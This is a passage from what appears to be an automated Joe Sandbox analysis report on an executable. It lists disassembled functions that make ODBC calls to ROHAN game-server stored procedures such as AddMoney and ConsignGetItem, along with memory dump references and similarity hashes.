                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {? = CALL [ROHAN_ConsignGetItem] (?,?,?)}
                                                                                      • API String ID: 0-2398152061
                                                                                      • Opcode ID: abd50475ea8552462f474b1afb9a04b7325a52bc2b2359917ef44be75a42d489
                                                                                      • Instruction ID: 3408619a253f28e4fb30b76cdc23c6f54abb56d0d18f5f519b15ea7a6e769502
                                                                                      • Opcode Fuzzy Hash: abd50475ea8552462f474b1afb9a04b7325a52bc2b2359917ef44be75a42d489
                                                                                      • Instruction Fuzzy Hash: 0A31E370E482186BEBA48F44CC52F9D7375EB84718F208289F71C6A2C5D7B979808F59
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{? = CALL [ROHAN2_ConsignGetItem] (?,?,?)},000000FD), ref: 004307B6
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 004307F5
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 0043082D
                                                                                      • #72.ODBC32(?,00000000,00000001,000000EE,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 00430865
                                                                                      • #72.ODBC32(?,00000000,00000001,000000E7,000000FB,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000EE,00000004,00000000), ref: 0043089D
                                                                                      Strings
                                                                                      • {? = CALL [ROHAN2_ConsignGetItem] (?,?,?)}, xrefs: 004307AD
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {? = CALL [ROHAN2_ConsignGetItem] (?,?,?)}
                                                                                      • API String ID: 0-2221601291
                                                                                      • Opcode ID: 70ddaed2d31ff64160582ee8cf7108f73cb285c3a07421e1f6061ffd4bf6572f
                                                                                      • Instruction ID: a126f9ebb17af9ac2ff7ad8eb9e22ad0882f2ed87481cd8c5fa5e61a161968dd
                                                                                      • Opcode Fuzzy Hash: 70ddaed2d31ff64160582ee8cf7108f73cb285c3a07421e1f6061ffd4bf6572f
                                                                                      • Instruction Fuzzy Hash: 953101B0E487586BEB608F44CC52FE97374EB44B19F208289F61C7A2C1D6F979808F59
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{ ? = CALL [ROHAN_AddBlackPoint](?,?,?) } ,000000FD), ref: 004260BF
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 004260FE
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 00426133
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0042616B
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 004261A3
                                                                                      Strings
                                                                                      • { ? = CALL [ROHAN_AddBlackPoint](?,?,?) } , xrefs: 004260B6
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: { ? = CALL [ROHAN_AddBlackPoint](?,?,?) }
                                                                                      • API String ID: 0-205923592
                                                                                      • Opcode ID: 975dad4ae994fc00092fe7140eb89ce936ea7334d73ca471d8dd67aa5b9147b4
                                                                                      • Instruction ID: 0aef55fb9a5a382306c36890f947f998fa94f203f390a2478d32423b58f2ccce
                                                                                      • Opcode Fuzzy Hash: 975dad4ae994fc00092fe7140eb89ce936ea7334d73ca471d8dd67aa5b9147b4
                                                                                      • Instruction Fuzzy Hash: 0F3105B0A402547BEB64DF44CC52FED7375EB84B18F208189FB186E2C5D5B16E808F58
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{? = CALL [ROHAN2_ConsignGetMoney] (?,?,?)},000000FD), ref: 00430236
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 00430275
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 004302AA
                                                                                      • #72.ODBC32(?,00000000,00000004,000000E7,000000FB,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 004302E2
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000E7,000000FB,00000000), ref: 0043031A
                                                                                      Strings
                                                                                      • {? = CALL [ROHAN2_ConsignGetMoney] (?,?,?)}, xrefs: 0043022D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {? = CALL [ROHAN2_ConsignGetMoney] (?,?,?)}
                                                                                      • API String ID: 0-2707633737
                                                                                      • Opcode ID: f50fb8ebc44380270e09cf23b9ca30c201113c20fb7a301724c445cab4a065b9
                                                                                      • Instruction ID: a355570d1f7059674d39b1c244eb4f77d68747717d74fd986ce5a4601cfabf74
                                                                                      • Opcode Fuzzy Hash: f50fb8ebc44380270e09cf23b9ca30c201113c20fb7a301724c445cab4a065b9
                                                                                      • Instruction Fuzzy Hash: B731D0B1E48218ABEB24CB48CC92FE97374EB84714F104289F71C6E2C4D6B979408F59
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{ ? = CALL [ROHAN3_AddMoney](?,?,?) } ,000000FD), ref: 0042B2FC
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 0042B33B
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 0042B370
                                                                                      • #72.ODBC32(?,00000000,00000001,000000E7,000000FB,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0042B3A8
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000E7,000000FB,00000000), ref: 0042B3E0
                                                                                      Strings
                                                                                      • { ? = CALL [ROHAN3_AddMoney](?,?,?) } , xrefs: 0042B2F3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: { ? = CALL [ROHAN3_AddMoney](?,?,?) }
                                                                                      • API String ID: 0-1356384992
                                                                                      • Opcode ID: bf1a19dd9ad0fe2d6dc0cdf7978c07f85751d398ffe044214a75212d7da4574c
                                                                                      • Instruction ID: 74c233c74c931631a375dec20295aeac84d2d770b75651916f83b94e963f8461
                                                                                      • Opcode Fuzzy Hash: bf1a19dd9ad0fe2d6dc0cdf7978c07f85751d398ffe044214a75212d7da4574c
                                                                                      • Instruction Fuzzy Hash: 173144B07442147FEB258F44CC52FAA7378EF85B14F10828CF6D46E2C4C6B16E408B49
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{ ? = CALL [ROHAN_DelSkills](?,?,?) } ,000000FD), ref: 0042746D
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 004274AC
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 004274E1
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F1,00000005,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 00427519
                                                                                      • #72.ODBC32(?,00000000,00000001,00000001,0000000C,000000FF,00000000,?,00000100,00000000,?,00000000,00000001,000000F1,00000005,00000000), ref: 00427557
                                                                                      Strings
                                                                                      • { ? = CALL [ROHAN_DelSkills](?,?,?) } , xrefs: 00427464
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: { ? = CALL [ROHAN_DelSkills](?,?,?) }
                                                                                      • API String ID: 0-4245388576
                                                                                      • Opcode ID: 4470ccf511d99a8f93723d4a0179d29ba0f2378d3aa834ce24a4339f086ca76c
                                                                                      • Instruction ID: d97a35575de81bfbbf5fdc3963e1973fe6898a64b8d56a03c22853284713eb70
                                                                                      • Opcode Fuzzy Hash: 4470ccf511d99a8f93723d4a0179d29ba0f2378d3aa834ce24a4339f086ca76c
                                                                                      • Instruction Fuzzy Hash: F8311470A403146BEB64DF44CC56FA97334EB44B14F204289F7146E2D5D7B96E80CF58
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{ ? = CALL [ROHAN_GetRTMOut](?,?,?) } ,000000FD), ref: 00424446
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 00424476
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 0042449F
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 004244CB
                                                                                      • #72.ODBC32(?,00000000,00000004,000000E7,000000FB,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 004244F7
                                                                                      Strings
                                                                                      • { ? = CALL [ROHAN_GetRTMOut](?,?,?) } , xrefs: 0042443D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: { ? = CALL [ROHAN_GetRTMOut](?,?,?) }
                                                                                      • API String ID: 0-1739745319
